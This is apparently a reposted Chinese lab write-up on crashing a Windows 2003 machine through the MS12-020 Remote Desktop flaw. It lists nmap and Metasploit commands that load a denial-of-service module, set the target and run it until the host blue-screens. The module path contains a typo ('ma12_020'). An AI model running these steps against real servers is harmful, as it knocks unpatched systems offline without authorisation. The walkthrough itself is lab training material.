MS12-020漏洞利用—蓝屏攻击


一、原理

        ms12-020漏洞的定义是指操作系统的远程桌面协议存在重大漏洞,入侵者(黑客)可以通过向远程桌面默认端口(3389)发一系列特定RDP包,从而获取超级管理员权限,进而入侵系统。
  根据实际被入侵终端进行分析,开放远程桌面服务并使用默认的3389端口的会成为攻击目标。

二、实验环境

 

攻击机:kali
靶机win2003 ip:192. 168.252.136

两者都在同一内网,采用NAT连接方式

 

三、漏洞复现

1、开启win2003的远程桌面:控制面板-->系统-->远程-->远程协助-->远程桌面

 

2、控制面板-->windows防火墙-->例外-->远程桌面

 3、用nmap扫描靶机,发现靶机的3389端口已经打开

输入:nmap 192.168.252.136

 

 4、在kali的终端中打开msfconsole

 

5、使用search功能搜索ms12-020,发现有两个可用模块。

输入:search ms12-020

 

6、使用第一个可用版模块

输入:use auxiliary/dos/windows/rdp/ma12_020_maxchannelids

 

7、利用set命令设置攻击的IP。

输入:set rhosts 192.168.252.136

          show options

8、输入:exploit,执行攻击

 

9、看一下靶机,发现靶机蓝屏了

 

 

 

 

 

 

 

 


免责声明!

本站转载的文章为个人学习借鉴使用,本站对版权不负任何法律责任。如果侵犯了您的隐私权益,请联系本站邮箱yoyou2525@163.com删除。



 
粤ICP备18138465号  © 2018-2025 CODEPRJ.COM